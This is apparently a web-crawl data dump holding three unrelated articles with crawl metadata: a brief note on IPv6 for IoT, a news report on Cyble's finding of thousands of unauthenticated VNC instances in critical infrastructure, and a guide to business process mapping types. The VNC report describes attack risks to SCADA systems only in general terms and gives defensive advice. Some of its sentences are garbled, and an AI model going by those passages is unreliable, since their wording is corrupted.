It is estimated that more than 50 billion devices will be wirelessly connected to the Internet of Things by 2020. Integration with the Internet implies that devices will use an IP address as a unique identifier. However, due to the limited address space of IPv4 (which allows for 4.3 billion unique addresses), objects in the IoT will have to use IPv6 to accommodate the extremely large address space required. Objects in the IoT will not only be devices with sensory capabilities, but also provide actuation capabilities. To a large extent, the future of the Internet of Things will not be possible without the support of IPv6; and consequently the global adoption of IPv6 in the coming years will be critical for the successful development of the IoT in the future. However, it also involves risks and undoubtedly represents an immense technical and social challenge. | <urn:uuid:181de940-0e0a-4a96-a1ee-d63e9c6141a0> | CC-MAIN-2022-40 | https://automotive.ciotechoutlook.com/cxoinsight/iot-bridging-the-gap-between-virtual-and-physical-world-nid-1982-cid-26.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00388.warc.gz | en | 0.926505 | 943 | 3.015625 | 3 |
Research from cybersecurity and threat intelligence company Cyble identifies a spike in attacks targeting virtual network computing (VNC) — a graphical desktop-sharing system that uses the Remote Frame Buffer (RFB) protocol to control another machine remotely— in critical infrastructure sectors.
Analyzing their Global Sensor Intelligence (CGSI) data, researchers observed a spike in attacks on port 5900 (the default port for VNC) between July 9 and August 9. Most of the attacks originated in the Netherlands, Russia and Ukraine, according to the company, and highlight the risks of exposed VNC in critical infrastructure.
Exposed VNCs Put Industrial Control Systems at Risk
According to a blog post, organizations that expose VNCs over the Internet, by not enabling authentication, extend the reach of attackers and increase the probability of cyber incidents. More than 8,000 exposed VNC instances were detected with authentication disabled. They also discovered that exposed assets connected via VNC are frequently sold, bought, and distributed in cybercrime forums and marketplace.
“Although the count of uncovered VNCs is low compared to previous years, it should be noted that those found during the time of analysis belong to various organizations that fall within critical infrastructure such as water treatment plants, manufacturing plants, research facilities,” according to the firm. Researchers succeeded in shrinking several human-machine interface (HMI) systems, supervisory control and data acquisition (SCADA) systems, and workstations, connected via VNC and exposed on the Internet.
An attacker accessing a dashboard can manipulate the operator’s default settings and can change values for temperature, flow, pressure, etc., which could increase stress on equipment, causing physical damage to the site and potentially to nearby operators. Exposed SCADA systems could also be operated by an attacker, who could further obtain confidential and sensitive information that can be used to compromise the entire ICS environment. Exposing systems in this way allows attackers to target a particular component within the environment and start a chain of events by manipulating various processes involved in the targeted installation.
Vulnerable VNC is an easy target for attackers
VNC allows access to a targeted machine and has woefully insufficient tools to protect those machines, even when using passwords. The damage that can be caused depends on the organization and user permissions under which VNC is running. In one example, a Ministry of Health system was exposed, which means private health information is exposed.
Remote desktop services, like VNC, are one of the easiest targets for hackers to identify, as they operate on well-known default ports and there are many tools out there to search for these services and brute-force the passwords. Any organization running public-facing remote access services with authentication not configured is basically putting out a ‘welcome’ sign to adversaries. Finding these kinds of open services is trivial, so any actor, from script kiddies to the most sophisticated, could take advantage of these misconfigurations to gain initial access to the environment. One of the challenges of protecting critical infrastructure environments is that many advocates assume there is an air gap that separates traditional IT networks from ICS networks. Segmented networks don’t always exist, and those responsible for defense need to have real-time visibility into public-facing services. These services need to have restricted network access with strong authentication enabled, including base-based authentication.” in certificates.
Businesses should limit their exposure to the Internet using VNC and use multi-factor authentication (MFA) for any remote connectivity to a network, including through VPNs or directly using protocols such as RDP, VNC, or SSH.
Cyber Security Researcher. Information security specialist, currently working as risk infrastructure specialist & investigator.
He is a cyber-security researcher with over 18 years of experience. He has served with the Intelligence Agency as a Senior Intelligence Officer. He has also worked on the projects of Citrix and Google in deploying cyber security solutions. He has aided the government and many federal agencies in thwarting many cyber crimes. He has been writing for us in his free time since last 5 years. | <urn:uuid:36162ae5-e55e-44b1-baa6-71c653ca14f3> | CC-MAIN-2022-40 | https://www.exploitone.com/data-breach/more-than-8000-exposed-vnc-instances-detected-with-authentication-disabled-belonging-to-critical-infrastructure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00388.warc.gz | en | 0.950406 | 838 | 2.671875 | 3 |
Business process mapping is an excellent way to optimize business process efficiency, improve business outcomes, and enhance financials.
When used properly, business process mapping can generate significant advantages, both for the organization itself and for other stakeholders, including employees, customers, and business partners.
Well-defined business processes are, after all, more efficient, visible, compliant, adjustable, and performant. All of these advantages, in turn, make the organization’s operations more effective and profitable.
To take full advantage of business process mapping, though, it is important to understand what process mapping is, how it works, and the differences between types of process maps.
4 Types of Business Process Mapping
Below we’ll look at several types of process mapping techniques, their differences, and their advantages.
Different process maps will identify different elements in a process, such as roles, responsibilities, goals, and resources. Here are a few examples.
Flowcharts are the most basic type of process map. They consist of a series of shapes, connected by arrows and lines.
Processes can be linear, though they often include decision points and are designed to map out specific elements, such as tasks, activities, and decision points.
Since flowcharts are so easy to understand, they are among the most widely used business process mapping techniques.
While flowcharts are useful for developing a clear understanding of a business process, they do not address other elements such as roles and responsibilities. For this, it is best to use different types of process mapping tools, such as those covered below.
2. Swim Lanes
Swim lanes are another type of process map that look much like flowcharts, except that they are divided into columns. Each column is assigned to a job function or role.
Like flowcharts, the workflow is broken down into tasks, activities, and decision points.
Yet since swim lanes also assign those tasks to job roles, they can help managers and employees know who is responsible for each task in the workflow.
3. Business Process Model and Notation (BPMN)
An approach that goes into further detail is called a Business Process Model and Notation, or BPMN.
This is a notation that helps to standardize business processes and establish a common language within visual process maps, such as flowcharts.
Since it is a common language, or notation, it can be understood and used to more effectively standardize business processes.
4. Value Stream Mapping
Value stream mapping is an example of a business process map that goes into far more detail than those covered above.
These diagrams focus on the value chain, or the process of transforming raw materials into an end product or service.
A value stream map displays more detail about each step in a process, such as the time and the resources needed for each task.
The purpose is to assess the costs, time, resources, and efficiency of an end-to-end workflow, which can help managers, better calculate the overall costs of a process.
Process mapping helps leaders solve problems, manage risks, increase efficiency, and improve performance across the organization.
As we can see, however, not all process maps serve the same purpose – there are clearly different types of process maps, each with a different focus and a different set of benefits.
Business process mapping, it should be noted, goes hand-in-hand with other disciplines and methodologies aimed at enhancing process efficiency and outcomes.
Beyond Business Process Mapping
Let’s look at a few other tools and frameworks that can be used improve business process performance and outcomes.
- Process mining is a technique that uses digital software to extract data from back end business processes. This can be useful for optimizing digital workflows, identifying deficiencies, and improving employee productivity. Like business process mapping, process mining can help managers diagram and understand a process. Unlike business process mapping however, process mining is aimed at identifying what a process looks like in the real world, as opposed to what it should look like.
- Process improvement methodologies are business frameworks designed to, unsurprisingly, improve business processes. These are management tools or models that identify best practices for driving quality improvement within processes. Lean is one example. This process improvement methodology aims at reducing waste within processes. That waste reduction in turn can improve efficiency, enhance quality, and improve process outcomes.
- Business process management software is an essential tool for designing optimizing and redesigning business processes. The exact features of these tools will vary depending on the software application. But features can include the ability to create flowcharts and business process maps, the ability to mine data from processes, task automation, workflow analytics, business process modeling, and more. These tools are becoming more essential, especially in today’s digital workplace, which involves the use of multiple software applications in a distributed work environment.
These are just three examples of tools that can be used in conjunction with business process mapping, and in some cases, they include business process maps or include features that complement and enhance business process mapping. For more information see our articles on some of the topics covered in this post, such as process mapping and BPMS. | <urn:uuid:4b3b8839-5aec-40a2-a432-b67f9a160b65> | CC-MAIN-2022-40 | https://www.digital-adoption.com/business-process-mapping/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00388.warc.gz | en | 0.940391 | 1,071 | 2.859375 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.